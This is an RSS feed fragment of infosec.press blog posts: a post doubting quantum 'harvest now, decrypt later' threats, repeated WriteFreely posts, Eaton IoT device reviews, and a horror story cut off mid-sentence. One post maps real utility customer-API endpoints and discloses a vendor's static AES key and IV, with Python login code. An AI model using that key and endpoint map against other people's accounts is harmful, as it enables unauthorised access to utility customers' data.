      <pubDate>Thu, 03 Jul 2025 15:21:57 +0000</pubDate>
    </item>
    <item>
      <title>20. &#34;Harvest Now, Decrypt Later&#34; isn&#39;t Real</title>
      <link>https://infosec.press/jaythvv/20</link>
      <description>&lt;![CDATA[As a profession, cyber/information security has been telling itself that it is &#34;risk-based&#34;, but often fails to live up to that in practice. We see this from hyping threats because they&#39;re cool and make for a good conference talk, to having to make a market for a new Gartner product category.&#xA;&#xA;We therefore often mistake the possible for the probable, and the PoC for a Production threat we have to invest to fix. Nowhere is this more extreme than in post quantum cryptography (PQC) and the false urgency of fixing it now, just in case.&#xA;&#xA;Crypto Agility and PQC&#xA;&#xA;Don&#39;t get me wrong. Crypto agility and PQC are good things. It is good to know which libraries in your code provide crypto functions so you can keep them up-to-date, whether for PQC or otherwise. That is not the debate. What I have trouble with is the urgency on a problem that everybody agrees to isn&#39;t real yet. There are no working quantum computers. Estimates are 5 (optimistic) to 10 (more realistic) to 20 (maybe) years out. Are we still doing risk-based infosec if we&#39;re spending time and effort on a problem that realistically won&#39;t occur for years?&#xA;&#xA;Are we, when most organizations can&#39;t even keep on top of known vulnerabilities or running an effective CSPM program? Between your phishing defense, ransomware resilience and XDR adoption, where does this rate?&#xA;&#xA;&#34;Harvest Now, Decrypt Later&#34; isn&#39;t Real&#xA;&#xA;&#34;Oh, but adversaries could capture TLS traffic, store it till a later date and decrypt when quantum computers are viable&#34;. &#xA;&#xA;Yes. Theoretically. But TLS + storage for 10 years is not free - especially when you consider the volume of TLS traffic that runs across the internet on a continuous basis. Google Search gives me daily internet traffic volumes running from 33 exabytes to 0.4 zettabytes which is quite the range, but enough to make it clear that is &#34;stupid scale&#34;. Therefore, simply due to volume, any HNDL would have to be targeted. Unless you&#39;re a foreign government or critical industry, that almost certainly already puts you outside of danger.&#xA;&#xA;But BGP Hijacks...&#xA;&#xA;BGP hijacks do happen, where adversaries route vast traffic volumes through infrastructure they control. This is almost certainly to capture metadata, not to HNDL. Even after filtering, what worth is a snapshot of a few hours or days after a decade? At the very least you&#39;d want a continuous stream. &#xA;&#xA;BGP hijacks would be incredibly wasteful to adversaries - storing data in the hope a fragment of a conversation might one day prove useful.&#xA;&#xA;What About Targeted Organizations or Journalists?&#xA;&#xA;If you&#39;re a targeted organization watch your XDR and network detection! If you&#39;re a journalist, use safe modes and reboot often as surveillance tools targeting you are already on the market.&#xA;&#xA;You&#39;re WRONG, I have Clearance and Know it Happens&#xA;&#xA;Very good. And maybe it is, but that still doesn&#39;t mean it&#39;s a threat. Those adversaries may believe it and waste their time. And you should still start your crypto agility program if not already done, for reasons nothing to do with PQC. Either way, I am happy to admit I am wrong, if that proves to be the case a decade from now. I&#39;ll wear the badge &#34;PQC, The One I Got Wrong&#34;. &#xA;&#xA;But I&#39;ll take those chances. At least as long as the front doors remain wide open in most of our organizations.&#xA;&#xA;]]&gt;</description>
      <content:encoded><![CDATA[<p>As a profession, cyber/information security has been telling itself that it is “risk-based”, but often fails to live up to that in practice. We see this from hyping threats because they&#39;re cool and make for a good conference talk, to having to make a market for a new Gartner product category.</p>

<p>We therefore often mistake the possible for the probable, and the PoC for a Production threat we have to invest to fix. Nowhere is this more extreme than in post quantum cryptography (PQC) and the false urgency of fixing it now, <em>just in case</em>.</p>

<h2 id="crypto-agility-and-pqc">Crypto Agility and PQC</h2>

<p>Don&#39;t get me wrong. Crypto agility and PQC are <em>good things</em>. It is good to know which libraries in your code provide crypto functions so you can keep them up-to-date, whether for PQC or otherwise. That is not the debate. What I have trouble with is the urgency on a problem that everybody agrees to isn&#39;t real yet. There are no working quantum computers. Estimates are 5 (optimistic) to 10 (more realistic) to 20 (maybe) years out. Are we still doing risk-based infosec if we&#39;re spending time and effort on a problem that realistically won&#39;t occur for years?</p>

<p>Are we, when most organizations can&#39;t even keep on top of known vulnerabilities or running an effective CSPM program? Between your phishing defense, ransomware resilience and XDR adoption, where does this rate?</p>

<h2 id="harvest-now-decrypt-later-isn-t-real">“Harvest Now, Decrypt Later” isn&#39;t Real</h2>

<p>“Oh, but adversaries could capture TLS traffic, store it till a later date and decrypt when quantum computers are viable”.</p>

<p>Yes. Theoretically. But TLS + storage for 10 years is not free – especially when you consider the volume of TLS traffic that runs across the internet on a continuous basis. Google Search gives me daily internet traffic volumes running from 33 exabytes to 0.4 zettabytes which is quite the range, but enough to make it clear that is “stupid scale”. Therefore, simply due to volume, <em>any</em> HNDL would have to be targeted. Unless you&#39;re a foreign government or critical industry, that almost certainly already puts you outside of danger.</p>

<h2 id="but-bgp-hijacks">But BGP Hijacks...</h2>

<p>BGP hijacks do happen, where adversaries route vast traffic volumes through infrastructure they control. This is almost certainly to capture metadata, not to HNDL. Even after filtering, what worth is a snapshot of a few hours or days after a decade? At the very least you&#39;d want a continuous stream.</p>

<p>BGP hijacks would be incredibly wasteful to adversaries – storing data in the hope a fragment of a conversation might one day prove useful.</p>

<h2 id="what-about-targeted-organizations-or-journalists">What About Targeted Organizations or Journalists?</h2>

<p>If you&#39;re a targeted organization watch your XDR and network detection! If you&#39;re a journalist, use safe modes and reboot often as surveillance tools targeting you are <em>already on the market</em>.</p>

<h2 id="you-re-wrong-i-have-clearance-and-know-it-happens">You&#39;re WRONG, I have Clearance and Know it Happens</h2>

<p>Very good. And maybe it is, but that still doesn&#39;t mean it&#39;s a threat. Those adversaries may believe it and waste their time. And you should still start your crypto agility program if not already done, for reasons nothing to do with PQC. Either way, I am happy to admit I am wrong, if that proves to be the case a decade from now. I&#39;ll wear the badge “PQC, The One I Got Wrong”.</p>

<p>But I&#39;ll take those chances. At least as long as the front doors remain wide open in most of our organizations.</p>
]]></content:encoded>
      <author>Hyperscale Security</author>
      <guid>https://infosec.press/read/a/imjp3mdith</guid>
      <pubDate>Tue, 24 Jun 2025 22:41:49 +0000</pubDate>
    </item>
    <item>
      <title>WriteFreely is very similar to and may be a sister project of WordPress.</title>
      <link>https://infosec.press/novatopflex/writefreely-is-very-similar-to-and-may-be-a-sister-project-of-wordpress</link>
      <description>&lt;![CDATA[WriteFreely is very similar to and may be a sister project of WordPress. However, after following the Fediverse instances, regardless of potential issues, the truth is that there is no such WordPress.org-based server that supports external accounts thus far.]]&gt;</description>
      <content:encoded><![CDATA[<p>WriteFreely is very similar to and may be a sister project of WordPress. However, after following the Fediverse instances, regardless of potential issues, the truth is that there is no such WordPress.org-based server that supports external accounts thus far.</p>
]]></content:encoded>
      <author>novaTopFlex</author>
      <guid>https://infosec.press/read/a/h7vmtv1kon</guid>
      <pubDate>Tue, 03 Jun 2025 02:44:16 +0000</pubDate>
    </item>
    <item>
      <title>Welcome to the Fediverse!</title>
      <link>https://infosec.press/novaTopFlex/welcome-to-the-fediverse</link>
      <description>&lt;![CDATA[Welcome to the Fediverse!]]&gt;</description>
      <content:encoded><![CDATA[<p>Welcome to the Fediverse!</p>
]]></content:encoded>
      <author>novaTopFlex</author>
      <guid>https://infosec.press/read/a/fthbmedjzo</guid>
      <pubDate>Tue, 03 Jun 2025 02:43:45 +0000</pubDate>
    </item>
    <item>
      <title>Hello! Welcome to the Fediverse!</title>
      <link>https://infosec.press/novaTopFlex/hello-welcome-to-the-fediverse</link>
      <description>&lt;![CDATA[Hello! Welcome to the Fediverse!]]&gt;</description>
      <content:encoded><![CDATA[<p>Hello! Welcome to the Fediverse!</p>
]]></content:encoded>
      <author>novaTopFlex</author>
      <guid>https://infosec.press/read/a/idryudy0r5</guid>
      <pubDate>Tue, 03 Jun 2025 02:43:14 +0000</pubDate>
    </item>
    <item>
      <title>WriteFreely is very similar to and may be a sister project of WordPress.</title>
      <link>https://infosec.press/fediverse-transition/writefreely-is-very-similar-to-and-may-be-a-sister-project-of-wordpress</link>
      <description>&lt;![CDATA[WriteFreely is very similar to and may be a sister project of WordPress. However, after following the Fediverse instances, regardless of potential issues, the truth is that there is no such WordPress.org-based server that supports external accounts thus far.]]&gt;</description>
      <content:encoded><![CDATA[<p>WriteFreely is very similar to and may be a sister project of WordPress. However, after following the Fediverse instances, regardless of potential issues, the truth is that there is no such WordPress.org-based server that supports external accounts thus far.</p>
]]></content:encoded>
      <author>Fediverse Transition</author>
      <guid>https://infosec.press/read/a/aerlcday66</guid>
      <pubDate>Tue, 03 Jun 2025 02:42:56 +0000</pubDate>
    </item>
    <item>
      <title>WriteFreely is very similar to and may be a sister project of WordPress.</title>
      <link>https://infosec.press/novaTopFlex/writefreely-is-very-similar-to-and-may-be-a-sister-project-of-wordpress-19g9</link>
      <description>&lt;![CDATA[WriteFreely is very similar to and may be a sister project of WordPress. However, after following the Fediverse instances, regardless of potential issues, the truth is that there is no such WordPress.org-based server that supports external accounts thus far.]]&gt;</description>
      <content:encoded><![CDATA[<p>WriteFreely is very similar to and may be a sister project of WordPress. However, after following the Fediverse instances, regardless of potential issues, the truth is that there is no such WordPress.org-based server that supports external accounts thus far.</p>
]]></content:encoded>
      <author>novaTopFlex</author>
      <guid>https://infosec.press/read/a/b4tiwpmpjp</guid>
      <pubDate>Tue, 03 Jun 2025 02:42:30 +0000</pubDate>
    </item>
    <item>
      <title>WriteFreely is very similar to and may be a sister project of WordPress.</title>
      <link>https://infosec.press/novaTopFlex/writefreely-is-very-similar-to-and-may-be-a-sister-project-of-wordpress</link>
      <description>&lt;![CDATA[WriteFreely is very similar to and may be a sister project of WordPress. However, after following the Fediverse instances, regardless of potential issues, the truth is that there is no such WordPress.org-based server that supports external accounts thus far.]]&gt;</description>
      <content:encoded><![CDATA[<p>WriteFreely is very similar to and may be a sister project of WordPress. However, after following the Fediverse instances, regardless of potential issues, the truth is that there is no such WordPress.org-based server that supports external accounts thus far.</p>
]]></content:encoded>
      <author>novaTopFlex</author>
      <guid>https://infosec.press/read/a/gttvog6h4v</guid>
      <pubDate>Tue, 03 Jun 2025 02:42:09 +0000</pubDate>
    </item>
    <item>
      <title>Eaton 2nd Gen Smart WiFi Devices</title>
      <link>https://infosec.press/tildavaan/eaton-2nd-gen-smart-wifi-devices</link>
      <description>&lt;![CDATA[I bought one so you don&#39;t have to. (Edit: at least until Eaton supports Matter over WiFi)&#xA;&#xA;Eaton EWSW15&#xA;&#xA;These devices connect to Azure IOT Platform. While I am sure Eaton has a great deal for that, it means that every time I turn the lights on or off, Azure gets paid a small amount of money.&#xA;&#xA;The switch, while not multi-touch capable, will wait 0.5s before turning the load on or off.&#xA;&#xA;In an event of a network connection disruption, when you are back online the switch will take ~5 minutes to become available in the app. There is no local control even though the ESP32-C3-MINI1 (datasheet) module can do this. The unit is provisioned with WiFi credentials over Bluetooth but other than that Bluetooth is not used.&#xA;&#xA;And when you use schedules, the status LED does not correspond to the actual state of the switch.&#xA;&#xA;I am still debating whether to give Schneider Electric Matter-over-WiFi a try, but the more I read the specs the more I become convinced that Z-Wave network I already have is the best.&#xA;&#xA;Edit: https://www.eaton.com/us/en-us/products/wiring-devices-connectivity/Matter.html suggests that at some point these WiFi devices will gain Matter support. If/when that happens, these switches, dimmers, and receptacles will become much more useful.]]&gt;</description>
      <content:encoded><![CDATA[<p>I bought <a href="https://www.eaton.com/us/en-us/skuPage.EWFSW15-C2-BX-L.html" rel="nofollow">one</a> so you don&#39;t have to. (Edit: at least until Eaton supports Matter over WiFi)</p>

<p><img src="https://media.infosec.exchange/infosec.exchange/media_attachments/files/114/456/866/597/551/126/original/2e58f39ef439ce2a.jpeg" alt="Eaton EWSW15"></p>

<p>These devices connect to <a href="https://azure.microsoft.com/en-us/solutions/iot" rel="nofollow">Azure IOT Platform</a>. While I am sure Eaton has a great deal for that, it means that every time I turn the lights on or off, Azure gets paid a small amount of money.</p>

<p>The switch, while not multi-touch capable, will wait 0.5s before turning the load on or off.</p>

<p>In an event of a network connection disruption, when you are back online the switch will take ~5 minutes to become available in the app. There is no local control even though the ESP32-C3-MINI1 (<a href="https://www.espressif.com/sites/default/files/documentation/esp32-c3-mini-1_datasheet_en.pdf" rel="nofollow">datasheet</a>) module can do this. The unit is provisioned with WiFi credentials over Bluetooth but other than that Bluetooth is not used.</p>

<p>And when you use schedules, the status LED does not correspond to the actual state of the switch.</p>

<p>I am still debating whether to give <a href="https://shop.se.com/us/en/product-category/switches-outlets" rel="nofollow">Schneider Electric</a> Matter-over-WiFi a try, but the more I read the specs the more I become convinced that Z-Wave network I already have is the best.</p>

<p>Edit: <a href="https://www.eaton.com/us/en-us/products/wiring-devices-connectivity/Matter.html" rel="nofollow">https://www.eaton.com/us/en-us/products/wiring-devices-connectivity/Matter.html</a> suggests that at some point these WiFi devices will gain Matter support. If/when that happens, these switches, dimmers, and receptacles will become much more useful.</p>
]]></content:encoded>
      <author>Tom Tildavaan</author>
      <guid>https://infosec.press/read/a/mmes7ony44</guid>
      <pubDate>Sat, 10 May 2025 14:15:28 +0000</pubDate>
    </item>
    <item>
      <title>Eaton Smart Breakers</title>
      <link>https://infosec.press/tildavaan/eaton-smart-breakers</link>
      <description>&lt;![CDATA[In case you want more #IOT in your life, Eaton ships remotely actuated circuit breakers.&#xA;&#xA;The breakers are provisioned using a &#34;BlinkUp&#34; system through your phone. You start the provisioning on your device, then put your screen to the sensor on the circuit breaker, your screen blinks a number of times sending WiFi credentials to the device, and then the latter connects to the Electric Imp servers. Eaton is using impOs as the basis of their offering, and Electric Imp is adamant they are secure.&#xA;&#xA;Now, Eaton provides API to these circuit breakers - https://api.em.eaton.com/docs, but there is no true local access - there is apparently a way to get local control, but your device must phone home weekly to receive configuration that would allow you to talk to your device locally.]]&gt;</description>
      <content:encoded><![CDATA[<p>In case you want more #IOT in your life, Eaton <a href="https://www.eaton.com/us/en-us/products/electrical-circuit-protection/circuit-breakers/smart-breakers-use-cases.html" rel="nofollow">ships</a> remotely actuated circuit breakers.</p>

<p>The breakers are provisioned using a “BlinkUp” system through your phone. You start the provisioning on your device, then put your screen to the sensor on the circuit breaker, your screen blinks a number of times sending WiFi credentials to the device, and then the latter connects to the <a href="https://www.electricimp.com" rel="nofollow">Electric Imp</a> servers. Eaton is using impOs as the basis of their offering, and Electric Imp is adamant they are secure.</p>

<p>Now, Eaton provides API to these circuit breakers – <a href="https://api.em.eaton.com/docs" rel="nofollow">https://api.em.eaton.com/docs</a>, but there is no true local access – there is apparently a way to get local control, but your device must phone home weekly to receive configuration that would allow you to talk to your device locally.</p>
]]></content:encoded>
      <author>Tom Tildavaan</author>
      <guid>https://infosec.press/read/a/mo6eda1b6b</guid>
      <pubDate>Sat, 19 Apr 2025 03:18:12 +0000</pubDate>
    </item>
    <item>
      <title>Smart Customer Mobile API</title>
      <link>https://infosec.press/tildavaan/smart-customer-mobile-api</link>
      <description>&lt;![CDATA[As I was writing this I decided to scan GitHub for the URLs I found so far, and, well, people smarter than me have already written a homeassistant integration against #SEW, but it is a bit different from what I saw in the field:&#xA;&#xA;https://github.com/cnecrea/hidroelectrica&#xA;&#xA;I&#39;d still like to describe how to locate the endpoints and the login process, so here we go...&#xA;&#xA;This is the second post about #SEW SCM API - Smart Customer Mobile API by Smart Energy Water, this time we will learn about different APIs using real world utility websites.&#xA;&#xA;It appears that there are at least two different API &#34;flavors&#34;. The one that uses ModuleName.svc/MethodNameMob naming convention and usually resides under PortalService endpoint, and the newer one, which lives under /API/.&#xA;&#xA;So e.g. Nebraska Public Power District has endpoints at https://onlineaccount.nppd.com/PortalService/, e.g. https://onlineaccount.nppd.com/PortalService/UserLogin.svc/help. Rochester Public Utilities runs a different set of endpoints, with the root at https://connectwith.rpu.com/api.&#xA;&#xA;The endpoints for the latter API can also be browsed at https://scmcx.smartcmobile.com/API/Help/.&#xA;&#xA;Different utilities pay for different set of modules, and here&#39;s some of the modules I have discovered so far:&#xA;&#xA;AdminBilling&#xA;CompareSpending&#xA;ConnectMe&#xA;EnergyEfficiency&#xA;Generation&#xA;Notifications&#xA;Outage&#xA;PaymentGateway&#xA;Usage&#xA;UserAccount&#xA;UserLogin&#xA;&#xA;For /PortalService/ endpoints you can visit BASEURL + /PortalService/ + ModuleName + .svc + /help to get the list of RPC calls you can issue. In order to find out what to send in the requests, you need to look into the calls within the apps for your utility. Note that some utilities opted out of the AES/CBC/PKCS5Padding PasswordPassword encryption, so let&#39;s hope this will be a trend forward. Currently SEW web portals talk to a completely different set of APIs to populate the interface, even though they are querying the same thing.&#xA;&#xA;So to start, here&#39;s how to login to your favorite utility:&#xA;&#xA;from typing import Mapping, Any&#xA;&#xA;import base64&#xA;import json&#xA;import hashlib&#xA;import requests&#xA;import urllib.parse&#xA;&#xA;from Crypto.Cipher import AES&#xA;&#xA;BASEURL = &#34;https://example.com/PortalService&#34;&#xA;&#xA;def encryptquery(&#xA;    params: Mapping[str, str], encryptionkey: str = &#34;PasswordPassword&#34;&#xA;) -  str:&#xA;    &#34;&#34;&#34;Encrypt with AES/CBC/PKCS5Padding.&#34;&#34;&#34;&#xA;    cipher = AES.new(encryptionkey, AES.MODECBC, IV=encryptionkey)&#xA;&#xA;    cleartext = urllib.parse.urlencode(params).encode()&#xA;&#xA;    # PKCS5 Padding - https://www.rfc-editor.org/rfc/rfc8018#appendix-B.2.5&#xA;    paddinglength = 16 - len(cleartext) % 16&#xA;    cleartext += paddinglength * chr(paddinglength).encode()&#xA;&#xA;    return base64.b64encode(cipher.encrypt(cleartext)).decode(&#34;ascii&#34;)&#xA;&#xA;def request(module: str, method: str, data: Mapping[str, Any]) -  Mapping[str, str]:&#xA;    encquery = encryptquery(data)&#xA;    # Or module + &#39;.svc/&#39;&#xA;    url = BASEURL + &#34;/&#34; + module + &#34;/&#34; + method&#xA;&#xA;    resp = requests.post(url, json={&#34;EncType&#34;: &#34;A&#34;, &#34;EncQuery&#34;: encquery})&#xA;    if not resp.ok:&#xA;        raise Exception(resp.statuscode)&#xA;    return resp.json()&#xA;&#xA;passworddigest = hashlib.sha256(&#34;PASSWORD&#34;.encode()).hexdigest()&#xA;Or ValidateUserLoginMob&#xA;response = request(&#xA;    &#34;UserLogin&#34;,&#xA;    &#34;ValidateUserLogin&#34;,&#xA;    {&#34;UserId&#34;: &#34;USERNAME&#34;, &#34;Password&#34;: passworddigest},&#xA;)&#xA;print(response)&#xA;response will contain some object, you will need LoginToken and AccountNumber to proceed with most of the other calls.&#xA;&#xA;It&#39;s a bit awkward that different utilities have different endpoints, which makes creating a universal client challenging, so for now I am researching the ways to get info from the Usage module. The parameters are weird (&#34;type&#34;: &#34;MI&#34;, or &#34;HourlyType&#34;: &#34;H&#34;), but we will get there.]]&gt;</description>
      <content:encoded><![CDATA[<p>As I was writing this I decided to scan GitHub for the URLs I found so far, and, well, people smarter than me have already written a home_assistant integration against #SEW, but it is a bit different from what I saw in the field:</p>
<ul><li><a href="https://github.com/cnecrea/hidroelectrica" rel="nofollow">https://github.com/cnecrea/hidroelectrica</a></li></ul>

<p>I&#39;d still like to describe how to locate the endpoints and the login process, so here we go...</p>

<p>This is the second post about #SEW SCM API – Smart Customer Mobile API by Smart Energy Water, this time we will learn about different APIs using real world utility websites.</p>

<p>It appears that there are at least two different API “flavors”. The one that uses <code>ModuleName.svc/MethodNameMob</code> naming convention and usually resides under <code>PortalService</code> endpoint, and the newer one, which lives under <code>/API/</code>.</p>

<p>So e.g. <a href="https://nppd.com" rel="nofollow">Nebraska Public Power District</a> has endpoints at <code>https://onlineaccount.nppd.com/PortalService/</code>, e.g. <code>https://onlineaccount.nppd.com/PortalService/UserLogin.svc/help</code>. <a href="https://www.rpu.com" rel="nofollow">Rochester Public Utilities</a> runs a different set of endpoints, with the root at <code>https://connectwith.rpu.com/api</code>.</p>

<p>The endpoints for the latter API can also be browsed at <a href="https://scmcx.smartcmobile.com/API/Help/" rel="nofollow">https://scmcx.smartcmobile.com/API/Help/</a>.</p>

<p>Different utilities pay for different set of modules, and here&#39;s some of the modules I have discovered so far:</p>
<ul><li>AdminBilling</li>
<li>CompareSpending</li>
<li>ConnectMe</li>
<li>EnergyEfficiency</li>
<li>Generation</li>
<li>Notifications</li>
<li>Outage</li>
<li>PaymentGateway</li>
<li>Usage</li>
<li>UserAccount</li>
<li>UserLogin</li></ul>

<p>For <code>/PortalService/</code> endpoints you can visit <code>BASE_URL</code> + <code>/PortalService/</code> + <code>ModuleName</code> + <code>.svc</code> + <code>/help</code> to get the list of RPC calls you can issue. In order to find out what to send in the requests, you need to look into the calls within the apps for your utility. Note that some utilities opted out of the AES/CBC/PKCS5Padding <code>PasswordPassword</code> encryption, so let&#39;s hope this will be a trend forward. Currently SEW web portals talk to a completely different set of APIs to populate the interface, even though they are querying the same thing.</p>

<p>So to start, here&#39;s how to login to your favorite utility:</p>

<pre><code class="language-python">from typing import Mapping, Any

import base64
import json
import hashlib
import requests
import urllib.parse

from Crypto.Cipher import AES

BASE_URL = &#34;https://example.com/PortalService&#34;


def _encrypt_query(
    params: Mapping[str, str], encryption_key: str = &#34;PasswordPassword&#34;
) -&gt; str:
    &#34;&#34;&#34;Encrypt with AES/CBC/PKCS5Padding.&#34;&#34;&#34;
    cipher = AES.new(encryption_key, AES.MODE_CBC, IV=encryption_key)

    cleartext = urllib.parse.urlencode(params).encode()

    # PKCS5 Padding - https://www.rfc-editor.org/rfc/rfc8018#appendix-B.2.5
    padding_length = 16 - len(cleartext) % 16
    cleartext += padding_length * chr(padding_length).encode()

    return base64.b64encode(cipher.encrypt(cleartext)).decode(&#34;ascii&#34;)


def request(module: str, method: str, data: Mapping[str, Any]) -&gt; Mapping[str, str]:
    enc_query = _encrypt_query(data)
    # Or module + &#39;.svc/&#39;
    url = BASE_URL + &#34;/&#34; + module + &#34;/&#34; + method

    resp = requests.post(url, json={&#34;EncType&#34;: &#34;A&#34;, &#34;EncQuery&#34;: enc_query})
    if not resp.ok:
        raise Exception(resp.status_code)
    return resp.json()


password_digest = hashlib.sha256(&#34;PASSWORD&#34;.encode()).hexdigest()
# Or ValidateUserLoginMob
response = request(
    &#34;UserLogin&#34;,
    &#34;ValidateUserLogin&#34;,
    {&#34;UserId&#34;: &#34;USERNAME&#34;, &#34;Password&#34;: password_digest},
)
print(response)
</code></pre>

<p><code>response</code> will contain some object, you will need <code>LoginToken</code> and <code>AccountNumber</code> to proceed with most of the other calls.</p>

<p>It&#39;s a bit awkward that different utilities have different endpoints, which makes creating a universal client challenging, so for now I am researching the ways to get info from the <code>Usage</code> module. The parameters are weird (“type”: “MI”, or “HourlyType”: “H”), but we will get there.</p>
]]></content:encoded>
      <author>Tom Tildavaan</author>
      <guid>https://infosec.press/read/a/w3lipuevcl</guid>
      <pubDate>Tue, 15 Apr 2025 23:34:39 +0000</pubDate>
    </item>
    <item>
      <title>Haunting</title>
      <link>https://infosec.press/jrdepriest/haunting</link>
      <description>&lt;![CDATA[I was sent to a psychiatric hospital experiencing a &#34;haunting&#34;.&#xA;It was one of those old school places that looks like a mansion out of a horror movie, a place that people spend a great deal of money to get access to.&#xA;As usual, I was handed a folder and USB drive full of research the investigative team had already completed.&#xA;This building had a series of unused sub-levels from the bad old days and an honest to god death tunnel.&#xA;The dead don&#39;t bother me so I snuck in through the external hatch, where they used to occasionally remove the bodies.&#xA;I&#39;ll skip the gory details if you don&#39;t mind and get right to setting up camp in the unused administrative office in the abandoned sub-level.&#xA;Ears aching, neck hairs standing up, gooseflesh, like a cold spark pulsing through the whole place.&#xA;I disguised myself as maintenance before grabbing my toolkit and heading up the stairs.&#xA;The drywall dust only served to make my appearance more convincing.&#xA;I did odd jobs around the place, listening, gathering intel.&#xA;Patients escaping their rooms was too common to narrow down, but talk of a frozen swimming pool pointed me in the right direction.&#xA;I had to be close.&#xA;Walking down a wide, empty hallway, I heard something plink and stopped.&#xA;&#34;You dropped a button,&#34; a husky voice said.&#xA;I looked down and saw, sure enough, a button on the linoleum behind me.&#xA;As I bent to pick it up, I got a look at the feet of the being who&#39;d spoken to me.&#xA;It was about an inch off the ground, barefooted, skin dry as stone and cragged, spotted with brown and gray.&#xA;My heart rate was steady, my breathing normal, I chuckled to myself.&#xA;&#34;Thank you,&#34; I said as I stood up and saw the whole thing.&#xA;It was morbidly obese, pale and dry as a porcelain doll, and stark naked. Fat hid any discernible sex.&#xA;Long white hair floated around its head like a bleached anemone. Eyes were yellow surrounded by black and the mouth was little more than a horizontal slash.&#xA;No smell other than ozone.&#xA;&#34;I haven&#39;t seen you around,&#34; I said.&#xA;&#34;Oh?&#34; it said. &#34;I&#39;m new here.&#34;&#xA;I held up the button.&#xA;&#34;Thanks again, uh…Miss…ter?&#34; I said, gazing expectantly.&#xA;&#34;It&#39;s Doctor, actually,&#34; it said, without moving its mouth, &#34;Doctor Sharpe.&#34;&#xA;&#34;Thank you, Doctor Sharpe, then.&#34;&#xA;I turned and started to walk away.&#xA;When you encounter an entity during a haunting, they typically want to be seen.&#xA;The theory is that they literally feed on your strong emotions, your reactions.&#xA;&#34;Wait a moment,&#34; it said in a softer tone.&#xA;&#34;Yeah?&#34; I didn&#39;t turn around.&#xA;&#34;Would you--like to play a game with me?&#34;&#xA;I grinned and I&#39;m sure it felt my elation.&#xA;&#34;I thought you&#39;d never ask,&#34; I said and turned back to face it.&#xA;There was a table in between us that hadn&#39;t been there.&#xA;&#34;Nice,&#34; I said, running my hand over its obsidian smooth surface.&#xA;The entity was standing on the other side, no longer a floating ball.&#xA;White hair hung down its oval face, wearing the same yellow eyes but with a delicate nose and pink lips around the mouth.&#xA;Broad shoulders were draped with a white gown more appropriate for a gothic sleepover.&#xA;She was smiling, shaking her cupped hands as something jingled inside.&#xA;&#34;What&#39;s your name?&#34; she asked, showing her yellow teeth this time.&#xA;&#34;Anderson,&#34; I said, giving her an alias.&#xA;&#34;I don&#39;t think so,&#34; she said, tilting her head, her hair fluttering briefly to life.&#xA;My ears tingled, and my hair ruffled just a little under my hat.&#xA;A breeze ran down my sides to my feet, up my calves and thighs, met in my crotch, ran up my torso, by my chest, then split and went down both arms.&#xA;She knew me now.&#xA;Whether she&#39;d be intrigued, confused, or angry remained to be seen.&#xA;&#34;Ooh,&#34; she said and that was all.&#xA;Coins clanged on the table as she opened her hands.&#xA;They were colored, shaped, and sized like American quarters but without the ridges.&#xA;&#34;Take some,&#34; she said.&#xA;&#34;And keep your button out.&#34;&#xA;I counted out four and slid them over in front of me.&#xA;Picking one up, I glanced over, &#34;May I?&#34;&#xA;Her yellow teeth smiled back as she nodded.&#xA;Dense, heavy in my fingers, like real metal.&#xA;Looked like cuneiform writing and instead of George Washington and an eagle, it was something like a lamprey&#39;s mouth on one side and a burning bush on the other.&#xA;&#34;You can see?&#34; she asked, squinting.&#xA;&#34;Yeah,&#34; I said. &#34;A real beauty.&#34;&#xA;And it&#39;s true. I&#39;ve seen lots of manifestations and this one was extremely detailed and surprisingly solid.&#xA;In other words, this place was very, very tangled with the other.&#xA;I stacked the coins in front of me and put the button beside.&#xA;&#34;So, Doctor Sharpe,&#34; I asked. &#34;What are the rules?&#34;&#xA;Her hair twitched.&#xA;&#34;Please call me Amelia,&#34; she replied.&#xA;&#34;Okay, Amelia,&#34; I said. &#34;Then you can call me Alex.&#34;&#xA;She leaned in, asking, &#34;Is that short for something.&#34; While her hair started to writhe.&#xA;&#34;Maybe,&#34; I told her, visibly grinning.&#xA;I can play games, too. Sometimes, they like that.&#xA;She leaned back and I felt nothing but anticipation from her.&#xA;&#34;You&#39;ve already stacked the coins, I see.&#xA;&#34;Put your button on top of them.&#34;&#xA;I did as I was instructed.&#xA;When I looked over at hers, the table had a mock temple made of old cardboard tubes from toilet paper and paper towels.&#xA;I blinked a few times and it was still there.&#xA;Another thing about hauntings.&#xA;Even though we are tangled with another reality, there are still some things we aren&#39;t able to see.&#xA;Our brains can&#39;t interpret it.&#xA;As a safety mechanism, it&#39;ll hide things from us until they can happen when we aren&#39;t looking.&#xA;When you look away, when you turn your back, when you blink your eyes, then your brain lets you see the change.&#xA;You couldn’t see it happen. That&#39;s not possible.&#xA;So I blinked to make sure she was done modifying the table.&#xA;&#34;You can go first, Alex,&#34; she said.&#xA;&#34;You have to use your finger to flick the button at the temple.&#xA;&#34;The goal is to be the first person to knock it down.&#34;&#xA;The button on her stack of coins glinted when I tilted my head.&#xA;&#34;That hardly seems fair,&#34; I said.&#xA;&#34;What would you prefer?&#34; she asked.&#xA;I looked down and saw my coins and button were replaced with food.&#xA;I looked up and the temple and everything was now desserts.&#xA;&#34;First one to finish eating the temple?&#34;&#xA;I picked up one of the pastries and took a bite.&#xA;Flaky, honey sweet, hint of pecan, powdered sugar on top.&#xA;&#34;Extremely good job on these,&#34; I said.&#xA;&#34;They taste freshly baked.&#34;&#xA;&#34;I&#39;m glad you like them,&#34; she replied, the table now covered in sweets of all kinds.&#xA;Instead of eating more, I put it down.&#xA;When they give you food, you have no idea what you are actually eating.&#xA;You really don&#39;t want to know some of the things I&#39;ve put in my mouth.&#xA;She frowned, bunching up her bottom lip.&#xA;Frustration.&#xA;&#34;I thought you wanted to play?&#34; she said.&#xA;&#34;Actually, I&#39;m down here because I heard about a frozen swimming pool.&#xA;&#34;Was that you?&#34;&#xA;Her hair danced.&#xA;&#34;They really seem to like it,&#34; she said.&#xA;&#34;I&#39;d like to see it, too, if that&#39;s okay.&#34;&#xA;She pointed beside us.&#xA;&#34;It&#39;s right there.&#34;&#xA;And it was.&#xA;An Olympic sized swimming pool, frozen solid.&#xA;I could see people at the far end.&#xA;There was a faint impression of ice skaters, of Christmas trees, of carolers singing.&#xA;&#34;Christmas,&#34; I said.&#xA;I felt myself slipping into it, could smell hot cocoa and cookies, could feel a fireplace nearby.&#xA;&#34;It is lovely,&#34; I said before shaking myself out of the reverie.&#xA;&#34;I cannot image how much effort that must have been to create for them.&#34;&#xA;Her face was stoic, stern, but her yellow eyes were moist, red tears welled.&#xA;&#34;They deserve it,&#34; is all she said before she and her entire table slid into the floor and vanished.&#xA;I hadn&#39;t felt malice or mischief, only 